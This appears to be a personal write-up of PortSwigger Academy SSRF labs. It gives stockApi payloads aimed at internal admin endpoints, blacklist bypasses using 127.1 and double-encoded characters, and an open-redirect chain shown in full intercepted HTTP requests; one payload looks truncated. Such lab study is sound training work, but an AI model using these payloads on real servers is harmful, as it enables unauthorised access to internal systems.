Published on

SSRF Labs Overview

Tools Used

  1. Burp Interceptor, Repeater and Intruder

1. Basic SSRF against the local server

The solution was quite straightforward,

The stockApi which goes as param when we require stock just should be changed to point to internal server

stockApi=http://localhost/admin/delete?username=carlos

2. Basic SSRF against another back-end system

In this lab we use burp intruder to iterate over "x" part of host 192.168.0.X. Rest all is same as above.

stockApi=http://1/admin/delete?username=carlos

3. SSRF with blacklist-based input filter

https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter

  1. Go to product details page
  2. Intercept request to fetch stock for a product
  3. Change the URL in the stockApi parameter to http://127.1/ADMIN to get the admin interface and then delete the user

PORTSWIGGER SOLUTION

Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.

Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.

Bypass the block by changing the URL to: http://127.1/ Change the URL to http://127.1/admin and observe that the URL is blocked again.

Obfuscate the "a" by double-URL encoding it to %2561 to access the admin interface and delete the target user.

4. SSRF with whitelist-based input filter ( Stuck !!!! )

Stuck in this lab

The whitelist filter is pretty adamant that that the host be stock.weliketoshop.net

  1. Tried using url fragment to seperate url i.e "#"
  2. Tried using HTTP request smuggling, not extensively tried but tried

WHAT TO DO ??

5. SSRF with filter bypass via open redirection vulnerability

  1. On view product details page ( https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=3 ) we have this button
/static/images/posts/ssrf_lab/Untitled.png
  1. On clicking this button we intercept this request
GET /product/nextProduct?currentProductId=2&path=/product?productId=4 HTTP/1.1
Host: acf81faf1e85136180ef3844007100b4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=2
Connection: close
Cookie: session=ShyBxGx8FgJi4QyE5kq0ROFWPk80ehxy
Upgrade-Insecure-Requests: 1

Which in turns send response as 302/redirection and redirects us to productId=4 page

  1. Not we can try changing the path variable and try accessing "admin" page, but sadly the admin page as given in the instruction is located in internal and is not a path on website and the redirection keeps on running without returning any response

  2. Now the stock checker api is taking this path to check stok

POST /product/stock HTTP/1.1
Host: acf81faf1e85136180ef3844007100b4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=3
Content-Type: application/x-www-form-urlencoded
Origin: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net
Content-Length: 83
Connection: close
Cookie: session=ShyBxGx8FgJi4QyE5kq0ROFWPk80ehxy

stockApi=/product/stock/check?productId=3%26storeId=2

We can try doing stockApi=http://host:port/admin, but it doesn't work as we get error invalid url

  1. But as we know that the internal server allows redirection to a certain product page, what we can do is use the same redirection request path in stock api and access the admin page. This is because the stockApi makes internal call.
POST /product/stock HTTP/1.1
Host: acf81faf1e85136180ef3844007100b4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=3
Content-Type: application/x-www-form-urlencoded
Origin: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net
Content-Length: 83
Connection: close
Cookie: session=ShyBxGx8FgJi4QyE5kq0ROFWPk80ehxy

stockApi=/product/nextProduct?currentProductId=2%26path=http://192.168.0.12:8080/admin/delete?username=carlos